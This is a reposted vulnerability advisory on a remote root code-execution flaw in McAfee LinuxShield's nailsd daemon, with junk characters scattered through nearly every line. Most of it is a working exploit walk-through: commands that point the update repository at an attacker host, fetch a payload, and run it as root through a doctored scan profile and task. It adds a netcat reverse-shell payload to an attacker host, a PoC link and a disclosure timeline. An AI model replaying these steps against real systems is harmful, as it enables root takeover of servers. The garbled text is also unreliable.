    * \9 c7 K, _$ q; W: h2 ^- X( GLinuxShield installations can be centrally controlled by ePolicy0 V  Z7 j% u7 v6 b4 q' o$ ^' J& G# g
    Orchestrator./ W! L3 I' m5 Q: h0 L, l. b

      D1 H; ?# r; R: }+ I(Product description from LinuxShield Product Guide)
      U4 I  S  b  b+ N" V5 Y1 X5 z- a" k7 u5 w& N; t
    9 r4 k" D7 d. m) z

    # ?9 \7 p# T5 [8 R8 N7 x  [Description:' N8 `$ P2 x1 V. q" ^
    ============, p. @/ t( U- J/ K* g1 T$ c& V' ?

    3 k! P7 g4 Y& Z* u, E% CThis vulnerability allows remote attackers to execute arbitrary code7 j) {4 K$ x  c8 F$ {
    on vulnerable installations of McAfee LinuxShield. User interaction
    * q8 G7 }$ u- S1 \( Nis not required to exploit this vulnerability but an attacker must9 ?, o3 Y2 U. Z+ {( h7 _3 i
    be authenticated.
    + C5 `' J" d' V' i7 I/ e) A8 [. e; V' Q
    The LinuxShield Webinterface communicates with the localy installed! N) V0 {( d9 W' [
    "nailsd" daemon, which listens on port 65443/tcp, to do7 Q  t, D( X! K
    configuration+ n! K  s" Y9 H" w* s& R
    changes, query the configuration and execute tasks.5 I! e$ f' t+ f, o2 j; g2 D7 @. r
    5 Q) X/ W1 C: k
    Each user, which can login to the victim box, can also authenticate
    * a( r' y; \& U6 R& zit self to the "nailsd" and can do configuration changes and& [- S- ]3 Q, R# k" d
    execute
    2 [( \& ?" z5 o' J% otasks with root privileges.
    3 n+ p9 Y, F7 J5 D/ s6 y1 O1 {) Z8 q) u& n2 J( W
    A direct execution of commands is not possible, but it is possible to
    3 @* @/ D7 B( Adownload and execute code through manipulation of the config and
      x2 Z# z9 `2 v* ^execute schedule tasks of the LinuxShield.
    ! x1 s# n, S/ e( \* l& c# \* n, v9 Y/ J- `/ r
    4 U7 h/ N/ }  f4 A, Z; a* W0 L
    walk-through (after the TLS handshake):% Y/ q; y: a8 @4 }; F$ K
    +--------------------------------------
    : ?5 {# B" {, J+ @& M5 J4 }4 i& I" ?, n
    nailsd > +OK welcome to the NAILS Statistics Service5 \0 w# d$ Z* D( h& t) {: x
    attacker> auth <user> <pass>! v# ?. e  ^1 i$ q" U) G
    nailsd > +OK successful authentication. n8 a/ \8 P1 _' b- |- n, P/ m5 S
    0 c3 |0 Q6 g( u: _" I2 y/ g- Q
    # Set the Attacker repository to download our code from a httpd! z# j9 b$ K0 K# |0 l
    # (catalog.z)/ L1 x! _5 Q# H! J7 |
    #---------------------------------------------------------------
    5 P# p  ^( A  r/ U; Z- Wattacker> db set 1 _table=repository status=1 siteList=<?xml version
      G5 j% e. a* h="1.0" encoding="UTF-8"?><ns:SiteLists
    # W3 ~2 B; d4 d6 \xmlns:ns="naSiteLi+ e' o8 g* [( S5 |
    st" GlobalVersion="20030131003110"
    + w9 ~! P8 r% M% u- m# `$ S; VLocalVersion="20091209
    5 T: _! S6 L9 s$ [161903" Type="Client"><SiteList
    ! e( G3 T3 z: I' v- [& N2 FDefault="1" Name="SomeGU
    5 g. l# K: Q7 O8 R. U6 m( r& lID"><HttpSite Type="repository"
    3 b" V3 X0 n. q$ X3 VName="EvilRepo" Order="1# k' C  m6 P4 H" ^# l+ z
    " Server="<attackerhost>:80"+ g1 i% C- r: m+ m0 J1 @0 U# g( x
    Enabled="1" Local="1"><Rela1 s) w; q# U( D" C; b; `! a( S

    / O0 Z! g/ r$ itivePath>nai</RelativePath><UseAuth>0</UseAuth><Use. v4 `  v* R' S+ \5 p& r' {3 l
    rName></
    5 X4 G3 Q. |9 y! e- x5 j; ]UserName><Password. Y4 k/ s5 A' p7 b8 O/ \
    Encrypted="0"/></HttpSite></SiteList></- f; S8 Z$ N* Y9 ~) J
    ns:SiteLists> _cmd=update
    * a2 V" D% e" X* Tnailsd > +OK database changes buffered.( T! q/ G0 g5 d' T
    * [) V- B* T/ `0 N/ o# D
    # Execute task to set the attacker repository7 S9 g1 j7 X) C9 d# ]; r
    #---------------------------------------------------------------
    : U/ I- m# ]& \* Z: F0 T' [attacker> task setsitelist
    $ u$ V9 E, J1 Y/ `  L; f. ^: fnailsd > +OK setting sitelist from CMA.
    + `1 I& d! Z/ f" i! |0 o9 r2 I8 {" z6 \1 t8 D6 f
    # Execute the default Update task to download the code
    ) m$ d/ p7 X, L, [& C0 E5 E: a$ l#---------------------------------------------------------------
    ; t6 U- |9 S- U- c0 f, \attacker> task nstart LinuxShield Update
    3 P4 z/ L' m/ wnailsd > +OK task LinuxShield Update starting
    * m) c, v' r6 I% c8 {! J9 f4 ]) e9 ]
    # Create a Scan profile, which executes our code. The profiles are1 y) J4 L4 e1 t8 X, f! S) Z3 k2 j3 c
    # not stored in the database.
    # M" V" }0 C/ Z6 M, y" X) k# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg: k, Y0 Z) v$ C+ w& z
    #---------------------------------------------------------------0 S; j" q  G+ `7 I& u
    attacker> sconf ODS_99 begin
    6 w/ Y9 D$ C$ s! a5 |nailsd > +OK 1260400888% u. P. r5 r+ I( f

    $ U3 y9 b. Q% g7 v$ F# Set the variable "nailsd.profile.ODS_99.scannerPath" to the: h$ T* j9 H: a* Q
    path
      T3 l6 c) G( v# where our earlier downloaded catalog.z file is stored." _  m, R' ^9 B' c
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    * q$ w, k: S# m3 {5 E+ [% D#---------------------------------------------------------------" S7 O. b& w4 }3 e
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    : B- H8 o) z' v- s4 ptrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O1 ?5 M3 }8 d! q8 P6 p/ s
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    1 r3 c1 r5 W- D# B/ {10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    & s: m& u* z7 x8 ?2 F7 k  hine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro) j( J+ W% f: X: r+ k
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD0 c+ o" `2 G  {# e/ _" q! Y
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    . q6 K; Y$ _, e7 F3 XginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    $ {' |3 W/ \3 a( K.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu. a$ n  T' N! m  ^1 o  @5 m
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru, S2 G: [) y, |
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_994 g6 a$ K3 A8 q# c, B# V% O" P
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi0 e, u* P& R# V/ S7 T
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    6 \% b) x- G: P: Q2 ?) ]6 @3 Edren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    # k4 z! D3 ]! T' l0 D2 `e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr# W; s* O, D8 g5 n
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm! `* t4 o. Z. x* @* C. G$ y* k8 E
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile4 h$ k% a! s  o" o
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t- ?4 j9 b; S$ g! A- p; h0 A
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    " ~0 V: L% Y7 n4 x6 I: tch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100' C, m% Y5 X- @6 H4 P/ E
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    * C; E5 {: I$ A0 j" u5 PODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ! T6 f" X% o5 zter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    2 I3 |0 \1 P7 {. |  \9 y5 O. M3 ~nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr8 s7 o* R! N! W
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    ( G- j* g, H4 w; L* k4 re.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99/ t" m& n) }  Y+ b
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.6 y6 u0 X1 ?+ f  r3 z8 E/ x
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s4 q) W9 i8 f; O/ Q$ i4 J
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa9 b7 P5 |4 i7 D' J7 s& J0 n
    ss nailsd.profile.ODS_99.action.error=Block5 I  f' O! d0 t  Y" x$ ^
    nailsd > +OK configuration changes buffered' v; U' G. W. A$ l4 K+ ^
    attacker> sconf ODS_99 commit 12604008888 H: C/ `1 w( E9 E+ i% |  I* I
    nailsd > +OK configuration changes stored
    * d1 u. T2 b; X) ~; |& t% d7 {' b5 Q( X# ~
    # Set a scan task with the manipulated profile to execute the code
      G, x) y5 d% J#---------------------------------------------------------------9 e3 k2 V) ]0 c7 j# ~
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy, ^, }5 ^+ x* _' k
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    8 }5 n* W2 I+ K: n& Z3 ]. f0 ?4 ?) M7 {mp;exclude:false timetable=type=unscheduled taskResults=0 i
    5 v' ?0 @  v& R9 ?: z8 z_lastRun=1260318482 status=Stopped _cmd=insert
    - x( `" E0 M+ t  snailsd > +OK database changes buffered5 K+ ^& W/ M7 c2 \# L$ z
    * o4 k6 n2 [) Q& V8 t/ _
    # Execute scan task to execute the code
    $ ^1 l- p7 j9 @) \$ V' y#---------------------------------------------------------------1 g5 e, a  \6 a7 d. G4 V
    attacker> task nstart Evil Task
    : J$ @- Z# H2 h6 D: ~" f- p% z6 P; g+ x4 `% F
    +-------------------------------------- walk-through EOF  ]0 a  A# _& L1 }5 b9 n* P3 X2 w3 C- ?

    . _8 v. ?; H; D2 ]
    / t3 i# Y* B( M( E8 y! ITo get a reverse root shell place something like this in the catalog.z2 B0 S& J( U7 a9 @9 O9 _
    6 ^" T! R9 m7 B5 _
    --- snip ---: Y( t( A9 h' v4 {
    #!/bin/sh
    ( [" C- j' I$ _: qnc -nv <attacker_host> 4444 -e /bin/sh$ U  q9 k# W5 s; [5 F  J( W+ z2 m1 ?! u
    --- /snip ---
    + i  p( v, M# R% Y: s: T: m9 t! c* e( [
    ! Q: o, Q: b+ I& q- {+ o) C
    - E# \+ Q7 C6 C+ p& Z( z
    Proof of Concept :, d4 Z$ M' C0 y6 c& G  `. d4 i; V
    ==================9 C. X' m1 s3 R

    + l/ e8 v! Y4 L, B9 Shttp://inj3ct0r.com/sploits/11165.tar.gz
    $ d0 ~/ Y" f, e& g1 y) }/ B% K. C' G
    & T( {3 T  l4 P+ y0 _
      e2 g: O; W$ v
    Solution:
    : X0 K( `0 S/ {. Z=========
    2 {& T8 h" w' u0 r$ q( `) Q$ J5 G& y0 z  \* h2 L* F! T1 `, j# q' p  f
    McAfee Advisory
    ( b/ J6 j2 C' H) u9 |( d+--------------% n0 Z5 j+ X, b' y& U% S
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    ) d/ S) b2 L  E) q, h/ ]
      A6 Z6 G. r" \8 t% }  A- V; A4 |3 Z/ w4 P$ c. B& K/ m
    4 f6 b0 l9 F3 P2 @- e
    Disclosure Timeline (YYYY/MM/DD):
    : o" M. Y: V7 x$ Q=================================# a7 D6 Y( w4 _7 S
    1 y8 ]9 [( g3 p& c% m  V' H
    2009.12.07: Vulnerability found
    8 b5 P2 q4 @) Q; C% O" R2010.02.03: Asked vendor for a PGP key" g: \& B0 X9 |8 `* Z
    2010.02.05: Vendor sent his PGP key
    9 L% U; b# L5 G$ H% q2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
      K& v8 \7 J" f0 [% Cdate (2010.02.18) to Vendor+ Y( T2 K4 N9 l4 Y$ ~
    2010.02.05: Vendor acknowledges the reception of the advisory4 n9 J3 I1 q! p$ g
    2010.02.16: Ask for a status update, because the planned release date is
    " B" W; V4 I# w3 }1 Y2 n0 ]! |2010.02.18.) K8 a" W( z  O0 n. V% v* v6 \
    2010.02.16: Vendor response that, they are currently working on a patch% N- Q3 o" Q7 C3 \' S$ O
    2010.02.17: Changed release date to 2010.02.25.
    2 i  m1 P' w& n# ~: v2010.02.22: Vendor gives a status update, that they are able to release" F  o* d. A5 I' c' d# S
    the patch on 2010.02.25.
    , ^, i" M# `2 W0 V6 `2010.02.24: Ask for a list of affected products and the advisory url.
    % u( L; `7 Q- y0 F# T2010.02.24: Vendor sends the list.
    ) w6 L0 x/ V* T1 P- ^2010.03.02: Release of this Advisory; t% |1 t- ?2 x0 m9 S9 Y0 m
    ) D" K% @1 P* |4 X- M
    6 z/ P  Z  E7 B! a" k
    9 a7 m7 z; v+ n6 f0 J  A0 F; G9 V1 V
    , B9 R" b' j' z( s4 ~3 R

    ' w% j) f6 ~: C% U1 c' r  t$ S* S3 X6 S
    + @2 A0 v+ R: |- K
    ) k  {$ p' l& M0 [- E, {8 `
    6 Y8 h9 _0 |. ~- P$ v

    0 L# q- n1 B7 u! A: c6 R2 _% ?* L1 z/ Z& n- }6 X' s4 Z" O/ t. n
    4 v/ w: b' P5 v9 X

    " l% L5 S, G5 X
    ' [8 J+ N9 a5 @1 R" r1 j
    - `; \, D2 }2 n9 y' ~/ R- l) o. h" A) e  `. c1 G9 O. H" a8 j

    5 Q+ U5 L+ M3 b) u- L. }) @* y5 P0 h6 [2 P" P" }/ k" Q2 D
    % q: r( A' x3 j: M# L( V+ t8 |

    ; g% p1 Q$ K1 `$ f; G
    4 b1 S: w- U  t: T/ n公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表